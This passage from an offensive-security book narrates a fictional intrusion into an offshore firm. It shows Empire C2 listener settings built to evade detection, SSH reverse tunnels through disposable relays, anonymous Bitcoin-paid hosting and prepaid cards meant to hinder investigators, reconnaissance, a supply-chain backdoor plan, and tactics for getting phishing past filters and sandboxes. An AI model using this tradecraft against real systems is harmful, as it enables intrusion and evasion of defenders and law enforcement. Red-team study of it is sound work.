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How to Hack Like a

A hacker’s tale breaking into a secretive
offshore company
Copyright © 2018 Sparc FLOW
All rights reserved. No part of this publication may be reproduced,
distributed, or transmitted in any form or by any means, including
photocopying, recording, or other electronic or mechanical methods,
without the prior written permission of the publisher, except in the case
of brief quotations embodied in critical reviews and certain other
noncommercial uses permitted by copyright law.

This is the story of one hacker who met his match in the form of
machine learning, behavioral analysis, artificial intelligence, and a
dedicated SOC team while breaking into an offshore service provider.
Most hacking tools simply crash and burn in such a hostile environment.

What is a hacker to do when facing such a fully equipped opponent?

In this new edition, we cover step-by-step tricks and techniques to

circumvent next-generation security vendors that gracefully sponsor the
many big shot hacking conferences, including Unmanaged PowerShell,
C# Reflection, DKIM signatures, Kerberoasting, terminating protected
processes and many more essential tips for hackers and red-teamers

Better buckle up, this is going to be one hell of a ride!

This book’s edition assumes prior knowledge of basic Windows

principles such as NTLM, pass-the-hash, Windows Active Directory,
group policy objects and so forth.

If you are scantly comfortable with these concepts, I strongly

encourage you to first read How to Hack Like a Pornstar
( or How to Hack Like a God (
before taking on this book.
Important disclaimer
The examples in this book are entirely fictional. The tools and
techniques presented are open-source, and thus available to everyone.
Investigators and pentesters use them regularly in assignments, but so
do attackers. If you recently suffered a breach and found a technique or
tool illustrated in this book, this neither incriminates the author of this
book in any way, nor implies any connection between the author and the

Any actions and/or activities related to the material contained within

this book is solely your responsibility. Misuse of the information in this
book can result in criminal charges being brought against the persons in
question. The author will not be held responsible in the event any criminal
charges are brought against any individuals using the information in this
book to break the law.

This book does not promote hacking, software cracking, and/or piracy.
All of the information provided in this book is for educational purposes
only. It will help companies secure their networks against the attacks
presented, and it will help investigators assess the evidence collected
during an incident.

Performing any hack attempts or tests without written permission from

the owner of the computer system is illegal.
Content table
Foreword ............................................................... 4
Starting blocks ....................................................... 9
Bending but never breaking .............................................................. 12
Scream, aim, fire! ............................................................................. 20
Pitching a curveball .......................................................................... 28
Perfecting the hook ........................................................................... 36

First dive in .......................................................... 52

Prison break...................................................................................... 53
Busted! 68
Big brother is watching you .............................................................. 75

Back to the arena ................................................ 82

Through logs and fire ........................................................................ 85
Russian roulette ................................................................................ 95
Finally free ...................................................................................... 108
Defeating the machines .................................................................. 117
Perfecting the backdoor .................................................................. 133

Salvation ........................................................... 150

Hunting for data .............................................................................. 155
Jackpot 165

Closing thoughts................................................ 169

Starting blocks
“When I'm in the starting gate, it's just me and the
Mikaela Shiffrin
If you have ever attended renowned security conferences, be it Black
Hat, Hack in The Box or RSA, you’ve probably witnessed the endless
parade of sponsors flashing their latest “cyber” products in the same way
Hollywood pushes its summer blockbusters: large ads in subway
stations, models at the company booth, glamorous night events and
champagnes soirées...

It’s no wonder that some people finally give in and agree to listen to
their notoriously intense pitches about cyber attacks, cyber awareness,
cyber threat hunting, and the many other “cyber” buzzwords that I can
hardly write down with a straight face1.

The corporate IT security market is starving.

In recent years, hundreds of innovative companies have flourished,

each one making increasingly grandiose claims about their abilities to
detect and block unknown threats and undisclosed vulnerabilities.
Granted, only a handful of these new players actually offer refreshing
solutions to age-old security questions (e.g., What are my critical
resources? Who can access them? How many admins are there? What
is considered normal traffic? What should be flagged as suspicious

However, the careful hacker should note that the majority of this so-
called “cyber-crap” has a pretty decent chance of detecting an off-the-
shelf obfuscated PowerShell command2 or Meterpreter executable
freshly generated on a standard Kali machine.

Understand that in an effort to maximize the time to market and

produce the “next big hit” in security, many vendors have simply opted
for a short-sighted and narrow approach: they greatly optimize their tools
to flag the most commonly used penetration testing tools: PS Empire,
Nishang3, Metasploit, Mimikatz, etc.

1 Some vendors even go as far as targeting specific security tools in a desperate

marketing stunt. See the following tweet and @Gentilkiwi’s
response :
2 Anything resembling “Powershell -enc JABiAHIAbwB3AHMAZQByAC[...]” for

It is a deceitful tactic that delivers quick results during short proofs of
concept conducted by low-grade pentesters, while being just enough to
impress CISOs and other decision-makers during a 30-minute demo.

In developing their “next-gen” tools, these vendors often opt for

glamorous buzzwords like machine learning, artificial intelligence, and so
on4. However, more often than not, their approach, at its core, relies on
some form of plain old signature matching drawn from learning
datasets heavily based on open source penetration testing tools.

Of course, far too many people are now familiar with the signature
model and its limitations when facing a new malware strain, so new
vendors who want to get a bite of the market share have had to revamp
their marketing techniques—hence the invention of a new cyber
buzzword almost every week.

You may not deal with these newcomers when hacking your next
target, but they are slowly taking over the corporate market share. Given
the ever-growing number of publicly shamed companies that succumb to
yet another trivial hack, executive management is increasingly pushing
IT teams to address current security issues in unreasonable time frames.

When facing these tight deadlines, CISOs would rather buy an

expensive cyber black box that ticks off all the fancy buzzwords making
headlines than take a few years to rationalize the internal network traffic,
set up segregated zones, enforce best admin practices, deal with those
VIPs, hunt down bad IT and business habits, and so on.

As hackers, we need to preemptively deal with these new defense

lines in the company’s network and start changing some of our old
hacking habits.

There was a time when security products were more civilized. If you
drop a malware and it gets flagged, the antivirus would simply remove it
and hand you the ball to try again.

However, the majority of new tools are playing dirty. When they
register a suspicious event (e.g., blacklisted domain, odd network packet,
uncommon IP address, process injection, etc.), they let it continue its
course but silently raise an alert and wait for the operator to hit the panic

4Obviously, I will not specifically name companies in this book, but every time you
hear the words “EDR” (for Endpoint Detection Response), “Next-Gen” something,
deep inspection or other fancy words, adopt a very skeptical approach.
If you get caught in your automated mode of dropping a PowerShell
Empire agent, port scanning and mass-Mimikatz execution—just like you
did in the old days—you will be busted harder and faster than a drug
dealer waiving his cocaine stash at a police officer.

Alright, maybe that’s not completely true right now because, let’s face
it, not every company has the resources to deploy machine learning tools
and complicated endpoint security.

Just keep in mind that Microsoft is working tirelessly on incorporating

increasingly complex security features into its new Windows releases
(more on that later) so these consequences will become increasingly

Soon, any company wishing to leverage machine learning power to

secure their systems would only need to activate a license on their
corporate dashboard, push a script on machines—and voilà! They’ve got
complete coverage in just a few days as opposed to the couple of months
currently needed by some products.

You see where I am going with this, right? In this How to Hack Like a
Legend edition, we will cover new and shiny techniques to fly under the
sophisticated radars of this new category of tools. We will attempt to hack
one of these rumored golden companies with a dedicated security team,
machine learning tools, and all the goodies that generously sponsor all
big-shot conferences, from Black Hat to RSA5.

Before starting with offensive matters and practical attacks, however,

let’s first set the scene and describe a crucial component of every hacking
job: the hacking infrastructure.

Bending but never breaking

If you had the opportunity to read How to Hack Like a Pornstar
(, and How to Hack Like a God
(, you will already be pretty familiar with the usual
hacking infrastructure we rely on to hide our identity:

5 Thanks for the T-shirts.

We connect to a public Wi-Fi hot-spot to access TOR or a VPN service
in a somewhat neutral country, through which we rent a virtual private
server (VPS) paid in Bitcoin6, which we use to launch all attacks against
our target.

I skip the details about using Bitcoin and Zcash to achieve an

acceptable level of pseudo-anonymity as this is a subject in its own right
and is covered extensively in a number of online articles (e.g.,

This layering of services, combined with a couple of common-sense

rules—for instance, not checking your personal Twitter/Facebook
through this platform—should provide all the anonymity one needs to
hack with peace of mind.

For a more in-depth description of how to set up this platform and all
the basic principles to follow, I encourage you to read chapter one of How
to Hack Like a Pornstar (

All in all, this setup is great for a one-time job, but as soon as you start
chaining targets, you will inevitably feel the weight of this architecture.

For each new target, we need to build a dedicated attacking server by

downloading and configuring our favorite tools, setting up listeners,
configuring payloads, etc.

Moreover, not all hosting providers offer the flexibility of big cloud
services like Amazon and Google Cloud, so it may not be possible to
simply clone machines or build a standard image that we can replicate.

6 or
The reason we need to take extra precautions is because we simply
cannot run the risk of having the same IP address attack Bank_A and

That’s the best way to attract the attention of some analyst who is
desperately looking to brand a new hacker group with a catchy name like
APT35 or FancyBear (

Some hackers even go as far as building ephemeral relays using

unsecured UPnP configurations on home networks to reduce their
exposure (Interesting talk at CanSecWest 2018 by @professor__plum

More importantly, though, having one front server to launch all of our
attacks necessarily makes it a single point of failure. All a company needs
to do to block our supposedly advanced malicious payload that we spent
weeks customizing is to blacklist the server’s IP address. So much for an
advanced attack.

Not to mention that the first analyst to spot our payload could simply
attack the server back—think Denial of Service, bruteforce attack, remote
code execution vulnerability in the exploit framework (Empire8 or
Metasploit), etc.

For all their ingenious tricks and bragging about their security skills,
very few hackers actually take the time to properly lock down their own
Command and Control (C2) servers (take a look at the following links and for stories of vulnerabilities
in popular remote access tools).

To avoid these issues, we will take the time to properly set up what
some might call a “resilient hacking infrastructure”. This environment will
provide maximum flexibility and modularity by tying each independent
brick of the infrastructure to an atomic operation of the attack.

If one operation gets busted—say, a brutal port scan using Nmap or

Masscan9—other operations conducted in parallel (phishing) could carry
on unscathed because they rely on separate bricks of the infrastructure.

7 This is especially true for engagements happening in a parallel timeframe. While

it takes a few days to break into a company, it may take as much as a few months
to locate and parse the data we are truly after, so hacking multiple targets at the
same time is not uncommon.
8 and
If an IP address tied to a particular reverse shell gets blacklisted, we
could, in a matter of seconds, set up another functioning C2 listener with
a new IP address—and without disturbing existing shells from other jobs
or networks that are not subject to the blacklist.

To achieve this level of resiliency, we adhere to the following golden

principle: Every asset facing the internet should be easily disposable.

Thus, in light of this new rule, when we revisit our earlier architecture,
we can immediately see the need to dichotomize backend servers per
function and add several public relays—preferably hosted on another
service provider (I removed elements related to anonymity for simplicity):

These public relays (or redirectors) will be assigned public IP

addresses ( in the figure above) and will form the visible
branch of the attacking infrastructure. Each of them simply forwards any
traffic it receives to their related backend server through an encrypted
SSH tunnel.

There’s nothing better than an example to fully walk you through the
process, so let’s get on with it.

We start by setting up the reverse shell listener on the backend C2

server. Say, we opt for an HTTPs Empire listener10 on port 844311:

(Empire) > Listeners

[*] No active listeners

11The screen command can be pretty useful to resume the Empire session after
terminating the SSH connection
(Empire: listeners) > Uselistener http

While we are on the subject of listeners, keep in mind that we can and
should customize each instance as much as possible to avoid easy traps
laid down by signature matching algorithms:

• First and foremost, we are activating HTTPS by adding a self-signed

SSL certificate, usually created during the installation of Empire12:

(Empire: listeners/http)> set Name https_1

(Empire: listeners/http)> set Host https://<PublicRelay_IP:8443>
(Empire: listeners/http)> set CertPath /root/Empire/data/

• Then introducing jitter to create some randomness in the beaconing

pattern, thus avoiding simple behavioral analysis tools

(Empire: listeners/http)> set Jitter 0.8

• Changing the “DefaultProfile” variable to mimic a Google search

request when fetching commands to execute, and therefore confusing
potential security analysts. The “DefaultProfile” format follows this
structure: GET request URI | User Agent | Header #1...

(Empire: listeners/http) > set DefaultProfile

business&aqs=chrome..69i57j69i6.309j0j|Mozilla/5.0 (compatible,
MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like

(Empire: listeners/http) > run https_1

12 Use the script located in Empire/setup to generate a new certificate at

As per this configuration, agents tied to this listener will poll C2
commands using the HTTPS protocol13 with requests like GET
/search?q=finance&oq=finance&aqs=chrome..69i57j69i6.309j0j or
GET /search?q=news&oq=news&aqs=chrome..69i57j69i6.309j0j.
They will also append classic HTTP headers like “Cookie: ...” and
“Accept: ...” to further confuse security analysts14.

Though the “Host” setting in the listener may be set to the fixed public
relay’s IP, we can freely override it later in the stager’s code; after all, the
whole point of this infrastructure is to use multiple domains and public IP
addresses tied to the same listener instance.

Speaking of which—to tie any public relay to this newly configured C2

server, we must build a tunnel between the two machines. SSH offers a
nice feature to do just that called “reverse port forwarding”.

It instructs the public relay to automatically forward all traffic received

on a port (e.g., 443) to a port on our C2 server (e.g., 8443). The only
catch is that, by default, SSH only allows forwarding local ports (i.e., 443
listening on the address which is obviously no good.

To be able to bind public ports (443 on the relay’s public IP), we need
to add the following directive to the /etc/ssh/sshd_config file:

#file /etc/ssh/sshd_config on the public relay

GatewayPorts yes

Once we restart the SSH server on the relay server, we can go back
to the C2 server and launch the following command to establish the

root@C2Server:~# ssh -nNT -R 443: <publicRelay_ip>

13 Empire generates a PowerShell agent that ignores errors raised when using a
self-signed certificate. It is all the better since even if we manage to generate a
valid certificate for one domain, it would necessarily be invalid if the fancy takes
us to use another domain. Obviously including all our C2 domain names in one
SSL certificate is not an option since anyone can poll this certificate and thus
uncover all of our domain names.
14 Unfortunately SSL alone does not guarantee total impunity. Some companies

perform SSL interceptions and can therefore decrypt the traffic on the fly.
Now every packet coming to the port 443 on the public relay will be
sent through the encrypted tunnel to the address
<C2Server_private_ip>:8443 where our Empire/Meterpreter listener is
located. Thus, the C2 server is only reachable through this one port that
is open on another server.

In fact, it does not even need a dedicated public IP address since the
tunnel is built using an outgoing SSH connection through the hosting
provider’s gateway. Such is the beauty of reverse port forwarding.

Rinse and repeat for the phishing redirector, except this time, instead
of an Empire Listener, we will have an Apache server delivering a legit-
looking website (more on that later).

As you can see, the redirector’s sole purpose is to channel encrypted

traffic (HTTPs in this case) to the C2 server. No data is stored and no
information transits in clear text in the relay machine.

The first hosting provider is oblivious to any attack going on, and even
if they choose to cooperate with law enforcement or the target’s analyst
team, they can only give them the second hosting provider’s gateway
(used by the C2 server to establish the SSH tunnel) which will not get
them very far in the investigation process, nor provide powerful leverage
over the second hosting provider.

If we lose one of our redirectors or would like to use another regional

IP address instead (such as China, Singapore, etc.), we can simply
spawn a new pubic relay in a new continent (or another hosting provider).
One SSH command later, we have an operating new front end with a
dedicated public IP address and domain name! Scalability at its best!

Any virtual private server (VPS) provider will give you the option of
having public IP addresses, but maybe not in all geographical regions—
hence the need to diversify your assets.

Domain names, however, are up for the choosing. We will deal with
this particular step in a dedicated chapter since it does require some
special attention.
Finally, we set up another VPS server for direct aggressive attacks:
Nmap scans, probing for vulnerabilities in the target’s web applications,
etc. We do not want these high-risk packets to be picked up by monitoring
devices, betraying our C2 shells in the process15.

All of these machines can host whatever operating system you feel
most comfortable with: Ubuntu, Red Hat, Windows, etc. If you get enough
CPU, you could even virtualize a Kali if your heart is set on it, but you will
quickly realize that we will not need many off-the-shelf tools for this
particular scenario, so a good old Ubuntu will do just fine.

**Notes on payment service providers**

In the first draft of this book, I suggested the option of subscribing to AWS,
Azure or Google Cloud to host our public relays.

They offer cheaper computing power, powerful APIs, access to wider

geographical regions and they add a certain level of credibility to our
public IP addresses.

The only issue is that these providers ask for a credit card number to
complete registration. Not the most privacy-friendly option.

There used to be an easy way around this restriction using prepaid virtual
cards. Services like Cryptopay, Bitwala and Wirex, for instance, allowed
people to order virtual VISA cards paid in Bitcoin without performing
identity checks (usually for a total of expenses up to $1000).

Using these cards, one could leverage Bitcoin’s pseudo-anonymity on

any e-commerce website and take advantage of AWS, GCloud and
Azure without compromising their identity.

However, on January 5th 2018, and with no advance warning, VISA

announced that it had terminated all cards produced by WaveCrest, the
main debit card issuer used by most Bitcoin prepaid virtual card services.

The announcement should serve as a gentle reminder of the increasingly

authoritarian and centralized world we live in.

While most virtual card services are still struggling to find an alternative
card provider, one or two services have managed to survive due to their
partnerships with smaller card providers (

15 For alternative setups and a detailed description of a resilient hacking (or Red
team) infrastructure, check out
However, the only one I could find that does not require ID verification
(up to $3000) is, but I find it impossible to trust a
payment website that does not even implement basic https security—it’s
2018 for crying out loud!

It seems the best we can do now is follow the matter closely and hope
that the virtual card business finds a way to reestablish its services.

Scream, aim, fire!

Now that have we properly set up our hacking infrastructure, let’s
discuss our target for this hacking exercise.

We are going after G&S Trust, a niche company that specializes in

the offshoring business. They help the wealthiest 1% create shell
companies in various parts of the world to manage and optimize their
asset allocation and revenue streams.

What you and I would bluntly call tax evasion is stretched into a whole
sentence of obscure financial jargon that makes it sound like an innocent
Sunday hobby.

Buckle up people, we are about to embark on a hacking journey that

will take us as far as the Seychelles islands, Cyprus and other tax havens!

Quick, what is the first thing that pops into your head when thinking
about penetrating a company’s defenses? Please do not say Nmap…

Exactly, phishing!

I used to challenge people to name companies that were breached

without the help of some form of email scamming, but since the Equifax
hack16, WannaCry debacle17 and NotPetya fiasco18—all of which
involved a lack of patching and a defective network segmentation—I tend
to refrain from openly raising the question.


Regardless, if you are looking for the surest way to breach a specific
company—as opposed to casting a wide net to catch low-hanging fruits—
phishing is the go-to attack strategy. It exploits a basic human weakness:
boredom at work coupled with the infamous see-link-click-link syndrome.

It may seem like an easy endeavor because of its over-popularization

by the media and, let’s be honest, security veterans, but sending a clean
and undetected phishing campaign requires hard work and meticulous

Before diving into technical details, let’s first gather a bit of information
about G&S Trust. Their main website ( states that
G&S Trust has around fifteen senior partners, spread across five
geographic locations: Cyprus, Seychelles, Hong Kong, Malta and, very
recently, Singapore.

We can always use this pretense in our phishing email. For example,
a new IT feature deployed in Singapore, IT problems due to new offices,
latency in email services, etc.

The main issue we may presently face, however, is the small number
of potential targets. Fifteen senior executives, plus probably one or two
accountants per country, barely brings our total to twenty-five.

We cannot be sure of the total count since we struggle to find

employees on LinkedIn (or any other platform) who are currently working
for G&S Trust. This is understandable given the company’s line of work
and obvious need for secrecy.

This puts us in a minor predicament. Phishing is, after all, a numbers

game. The more targets we have, the more flexibility we gain. Fifteen
people (plus some accountants and analysts that we have trouble finding)
is a seriously small target. It doesn’t give us much room for testing, much
less failure.

Furthermore, when you think about it, it’s not like we can breach the
company’s network by sending a trapped attachment to senior executives
who spend most of their time working on an iPhone from the airport’s VIP
**Notes on state actors and phishing**

State actors have been known to only target one or two responsive
employees and fingerprint their environment through multiple phishing
emails containing attachments; which version of Office are they running,
what is their default browser?

After a period of reconnaissance, they finally send the coup de grace in

the form of another email, this time with a tailored exploit designed to take
advantage of vulnerabilities in their environment.

I will digress a bit, but it kind of reminds me of those veteran

pentesters who loudly proclaim on social media and drunkenly declare at
DEF CON parties that “hacking is easy. You just need to drop a USB
Rubber Ducky19 in a parking lot and wait for shells to pour in. Haha.”


Maybe that was true twenty-five years ago, back when you could dial-
in into an electric main grid over Telnet with “root/root”, but those days
are long over.

I am not saying that dropping USB keys (provided one cares to mail
them, use a mule, or personally drop them) does not work anymore20. It
still does to some extent. However, arguing that it is an easy and foolproof
method is not sensible or helpful.

Hacking is not easy, nor is it difficult. It depends on the company’s

context. How seriously does it take security? Which processes and
technologies does it rely on? How does it handle day-to-day incidents?
How great is its exposure to opportunistic attacks?

In any case, back to G&S Trust. Let’s leave this phishing thing aside
for now21 as a kind of last-resort weapon if everything else fails and focus
on searching for another entry point—hopefully a vulnerability on some
of their internet-facing applications, perhaps? Let’s dig into that.

20 On a side note, check out this awesome project to execute custom payloads
over Wi-Fi by injecting keystrokes using a custom USB key
21 One could argue that, despite the seriously small target and thin odds, it is worth

going down the phishing road. After all, we only need one gullible user to get in.
However, bear with me—I have something more interesting in store for you.

As stated in the previous chapter, all the following direct probes are sent
through the FrontGun server, either through a proxychains tunnel or
commands executed directly on the server.

The main website is hosted by a third party as illustrated in the WHOIS

look-up below22:

We will not even bother looking for vulnerabilities on this one. We are
trying to breach the company’s network, not that of its hosting provider.

To find other websites and applications belonging to G&S Trust, we

can rely on traditional subdomain enumeration using dns-recon, but there
is a much more efficient tool to uncover obscure subdomains linked to a
company’s name:

Censys is an academic project created by the University of Michigan

that routinely scans the internet, gathering information like open ports,
HTTP banners, etc. In that respect, it is no different than Shodan. Here
is where it gets interesting, though. Censys also indexes SSL certificates,
namely the CN field that specifies alternative subdomains covered by the
same certificate.

For example, a simple search for reveals a rich set of


22,, or the whois command on a Linux machine

While Censys is a great tool to find the more complicated and
uncommon subdomains (e.g., that will likely
be missed by traditional enumeration tools like DNS Recon 23, it is always
good practice to take the best of both worlds (censys and dns-recon) to
draw the most accurate picture possible.

You can download a small script ( form this book’s

Github that queries Censys’s API and cleans up the result nicely. It
requires a free Censys API key, which is available at their main website:

root@FrontGun:~# python

[+] Connecting to Censys
[+] Parsing results
[+] 5 unique domains

Isn’t that depressing? I know that G&S Trust is niche company, but
there are local bloggers with more websites than that.

In case we have missed any website, we fire subsequent search

requests blindly, aiming at other potential top-level domains, or name
variations, such as .net, .org,,, etc., but
nothing gives. We end up with the following list:


Some of these websites could be hosted by third parties and others

by G&S Trust itself, so just like before, we inspect the network owner to
shed light on the asset’s physical location.

23Yes, DNS-Recon also looks for CNAME and MX fields, scouts Google and Bing
for subdomains, but the bruteforce attack is certainly DNS-Recon’s most powerful
and comprehensive feature.
I put together a handy python script that does the job
( It loops through multiple WHOIS calls and extracts
relevant information in a readable Excel file:

root@FrontGun:~# python domains.txt| column -s","


Only the webmail ( and seems

to be located within the company’s IP range: - Other web applications, (e.g., are
hosted by cloud providers like LiquidWeb and Google Cloud.

We try playing with the webmail interface, looking for hidden

directories, injecting special characters here and there—basically, we try
every classic web technique, but who are we kidding? Unless we dig out
a 0-day on the official Outlook WebApp 2016, we are not getting in25.

An Nmap scan looking for reachable services on the whole IP range

owned by G&S Trust returns no significant results (-sV displays the
service’s version, -p- scans the complete 65535 ports):

root@FrontGun:~# nmap -p- -sV

Starting Nmap 7.01 ( )
Nmap scan report for
Host is up (0.023s latency).
Not shown: 65535 filtered ports

24 OWA being Outlook Web Application

25 We could try a bruteforce attack, but I am not a big fan of this procedure without
at least some kind of assurance that we will not trigger a massive account lockout.
Nmap scan report for
Host is up (0.023s latency).
Not shown: 65534 filtered ports
443/tcp open https

Let’s take a moment to recap. We are targeting a small company of

maybe fifteen to twenty-five people. They have one webmail on the
internet, four websites hosted by third parties, and nine allocated IP
addresses, all of them hardly exposing any service.

Did I bum you out yet or should I keep going?

When facing a target so small that even Google has trouble indexing
their websites, you should always pause for a few seconds and think
about the big picture. G&S Trust is not an island lost in the big blue sea
that is the internet.

They must have multiple interactions with many vendors, business

partners and contractors to function properly in today’s economic world.
It is not called the World Wide Web for nothing.

So yes, G&S Trust might be immune to most of our attacks because

they made it their mission and business model to stay off the grid, but
what about their business partners? I am not suggesting that we hack
Microsoft or Apple to get inside this small company, no matter how many
billions of dollars they bury in tax shelters.

Surely, they must have “weaker” and more exposed partners that we
can infiltrate and use as a trampoline to bounce onto their internal

We go back again to our reconnaissance phase and scrape together

every piece of news about G&S Trust that might disclose business
partners or technologies that they use. We’re looking for information on
HR software, recent mergers and acquisitions, accounting software,
senior partners’ background, etc.26.

Companies unknowingly divulge a significant amount of information

about their internal gears—probably more than intended.

26 A great compilation of open source intelligence (OSINT) tools to check out:
Take job descriptions, for instance. We gain a trove of data simply by
looking at an old job offer posted G&S Trust on a popular hiring website
(interesting list to check out at

From this alone, we are able to figure out that G&S Trust only uses
Windows 8.1 and 10 computers, works mainly with SQL Server
databases 2012, and installed Juniper and Cisco Firewalls. While this
might not help us get in directly (unless we use some form of social
engineering), it might provide valuable insight once inside the network.

Of the two LinkedIn profiles of former employees we found, both of

them seem to mention more or less the same obscure “skills” related to
the corporate finance world:

A quick Google search reveals that the “Strat Accounting” skill

mentioned in the figure above is in fact a software product owned and
maintained by Strat Jumbo Inc., a multi-national development company.

Strat Jumbo specializes in developing financial products, ranging from

SWIFT connectors on servers to workstation tools, like Strat Accounting,
which is used by our financial employees at G&S Trust.

Do you smell that?

That’s the smell of a very tempting yet dangerous idea that starts to
take shape somewhere in the darkness of our minds.

Since G&S Trust is so tightly locked down—from the outside, at

least—how about targeting the much bigger fish, Strat Jumbo, which is a
business we do not care about but could give us free access to G&S
Trust’s network?
I doubt that Strat Jumbo is directly connected to G&S Trust’s internal
network. They are a software development company, not a strategic
business partner.

The more likely scenario we could imagine is to infiltrate Strat Jumbo’s

corporate network, locate Strat Accounting’s code repository, and then
plant a backdoor that gets triggered next time G&S Trust updates their
accounting software on workstations.

To execute this strategy, we’ll have to carefully design this backdoor

to ensure it does not infect half the planet and cause mayhem, of course,
but it certainly is a tried and true technique that has proved its efficacy
throughout the last decade27.

Some of you, however, may now be wondering how this technique is

different from phishing, which most of the time tends to yield the same
result: executing payloads like reverse shells on a sizable number of

One word: trust.

Instead of shipping the payload in an email that goes through thirty-

six security hoops before landing on the user’s workstation, our payload
is delivered by a trusted and a verifiable emissary: Strat Jumbo.

If the antivirus flags our email attachment, an investigation is usually

prompted, security analysts are called and sometimes the issue
escalates to the chief information security officer (CISO).

On the other hand, if the antivirus flags the accounting software that
has been used for the last ten years, it takes just one call to the IT admin
team and the antivirus is either disabled or an exclusion list is created to
spare the software. How’s that for a preferential treatment...

Pitching a curveball
Now that we have our theoretical scenario in mind, we can start the
same dance all over again, i.e., digging out as much information as
possible on Strat Jumbo using Google, Github, LinkedIn, Twitter,
Shodan—all the classics28.

28 Did I mention ? yes, well it’s that
Strat Jumbo Inc. is a London-based company with around 800
employees (mainly back-end programmers) spread across ten countries.
This is a company with enough potential targets to ensure a significant
ROI should we conduct a phishing campaign.

We can already imagine seductive topics for such a crowd: a new

framework plugin, a corporate poll: NodeJS vs Java, beta access to a
new IDE, and so forth.

However, before drafting the phishing email, let’s take a brief look at
their internet-facing assets. The idea is not to look for vulnerabilities—
though we will not shy away from playing with some parameters here and

The true purpose of such an operation is to simply see what their

websites look like, which domain names they commonly use, what their
color chart is like, etc.

We even exchange a couple of emails with the sales department who

are easily reachable through their public contact form to acquire their
email template (employee email format, signature, color chart, font, etc.):

I cannot stress the importance of these finer details. They help paint
a trusted canvas that is visible only to the victim’s subconscious brain.
Satisfy this wild beast and it will immediately inhibit future suspicions
coming from the frontal lobe.

The result is that the target is “naturally” compelled to click on the link
and download the attachment because the email feels familiar at a deep
level. It is consistent color-wise, shape-wise and content-wise with the
target’s unconscious expectations.
To discover Strat Jumbo’s internet domains, we follow the same
approach as before, using a combination of Censys and DNS-Recon29 (“-
t” option indicates a bruteforce attack while “-d” points to the wordlist

root@FrontGun:~# ./ -D -t brt -d


root@FrontGun:~# ./ -d

Ah, a breath of fresh air! Now we are talking. As opposed to G&S

Trust, Strat Jumbo has a good number of internet applications. We find a
wide range of services, from Citrix access for remote developers to niche
websites dedicated to corporate events 30.

Webscreenshot31 is an interesting tool to crawl through a large set of

websites and grab a screenshot of the main page for a quick manual

root@FrontGun:~# pip install webscreenshot

root@FrontGun:~# webscreenshot -i urls.txt version 1.8

[+] 84 URLs to be screenshot

[+] 84 actual URLs screenshot
[+] 0 error(s)

30 is another interesting website to find subdomains.
A tip courtesy of @5ub34x
32 You can also use Chrome and Firefox’s headless features
At this point, your usual red-teamer or pentester will jump right into
typing out a tempting phishing email that pulls all the stops: time
constraint, intrigue, convincing pretense, right keywords, fitting email
template—but before leaping right in, I would like to take a few lines to
stress a couple of key points about the enemy lines we are about to cross.

The reason I want to take a moment focus on this part is because

most phishing campaigns I have witnessed are so poorly executed that
they barely make it to the spam folder.

Most of them just get flat rejected by the corporate email server. Sure,
theoretically speaking, we only need to fool one user to get inside, but
why raise so many alerts and suffer such thin odds when minor
adjustments could dramatically increase the campaign’s success?

Let’s examine the technical challenges that we face when sending

phishing emails:

Spam filters

Though the algorithms of the mail servers of big giants, like Gmail,
Exchange, are for the most part unknown, there have been many studies
conducted that focused on means to reliably identify and block spammy

One such crucial item, for instance, is the sender domain’s reputation.
The first mistake that most red-teamers, hackers and pentesters make is
registering a new domain a week or two before the phishing campaign
under the assumption that it will provide them with a “clean slate”. This
could not be further from the truth.

This new domain has no history, no back-links and no ranking—in

short, it has zero reputation.

When receiving emails from such a virgin domain, spam filters will
automatically give them a crappy score, categorize them as possible junk
mail, and either send them to the spam folder or issue huge security
warnings that disable images and links altogether (e.g., this is sometimes
the case with the Microsoft Exchange server).

Hence the importance of properly configuring the domain we use to

send emails and avoid some of the common traps that can literally spoil
our phishing campaign (more on that shortly).

Email sandbox

An increasing number of companies are putting sandboxes at their

email gateways.

These components34 execute the attachment in a virtual environment

and monitor all of its activities to assess its threat level: which registry
keys did it create? How many memory requests did it issue? Which
domains did it communicate with? Which files did it create? etc.

There are many reliable techniques to obfuscate a malware, from

zipping the payload with a password to implementing checks to detect a
virtual environment and simulate a benign behavior. But you know what
works best?

Not including the payload as an attachment.

They can’t scan what’s not there, right?

Including a download link in the email’s body is a much safer

alternative. Once users click on the link, they end up downloading the
malware over HTTP(s). Should we fear a sort of sandbox environment
there as well?

34An example of an online sandbox to test payloads:
Maybe, but that is not something I have excessively encountered.

Understand that sending an attachment to a sandbox environment

takes time, at least two to three minutes for the most efficient ones, not
factoring in possible delays due to connection errors (e.g., malware
cannot reach the C2 server over the internet) or intentional attempts to
bypass the sandbox’s timeout (e.g., the sandbox may just give up after
twenty minutes of execution if nothing suspicious is observed).

Most employees will tolerate a delay of a couple of minutes when

receiving/sending emails. After all, it is not a chat system. The same
rarely holds true for HTTP, where users stare at their download progress
bar and expect to read/execute their files immediately.

The very few companies that go through the pain of automatically

sending files downloaded over HTTP(s) to a sandbox regularly face the
problem of decrypting SSL on the fly.

Depending on the legislation applied to the company 35, it cannot

decrypt all communication flow initiated by its employees. Certain
websites (banking, healthcare, insurance, etc.) are usually excluded from
SSL interception to preserve the individual’s right to privacy.

One way to use this to our advantage is to make sure that our domain
that is hosting the malware is categorized as a sensitive resource (again,
more on that when registering domains later).

We come back to it full circle: our domains need to be carefully chosen

and configured!


Finally, the antivirus at the workstation scans the attachment

downloaded to the user’s download/temporary folder, but that’s hardly
something new. We will have to deal with the antivirus at some point or

The one reliable way to defeat all antivirus solutions is to generate our
own custom stager without blindly copying ready-to-use code from
existing public resources.

35This is true about most of Europe where a strong sense of privacy is advocated
by the Law. Things might be different in the US, UK, China and other pro-
surveillance countries.
The stager is a small piece of code that downloads the full malware
and ideally runs it in memory. Since an antivirus software does not check
memory36, we can pretty much inject whatever we like, including
Meterpreter, Empire reverse shell, etc. Will this help us escape new
generation tools? We will find out soon enough!

But here’s another confession: whenever possible, I try to avoid

download links as well.

People are more willing to enter their credentials to view a corporate

page (1 action) than download a file, open it and accept the security
warning that usually pops up afterwards (3 actions).

Moreover, I just find that using link/attachments is crude and, well, too
noisy! Think about it, you will likely have a hundred machines pinging the
same C2 host over the course of at least 24 or 48 hours, if not more.

This sort of traffic stands out like a sore thumb to any decent analyst.
Some may even automate correlation rules to detect this precise
behavior. Furthermore, having a stager running on a workstation is
unstable at best.

It strips away much of the control from the hacker to put it right into
the user’s hands; they could turn-of the workstation, lose Wi-Fi in the
elevator, put the computer in sleep mode, etc.

To achieve reliable persistence requires quick actions (either built into

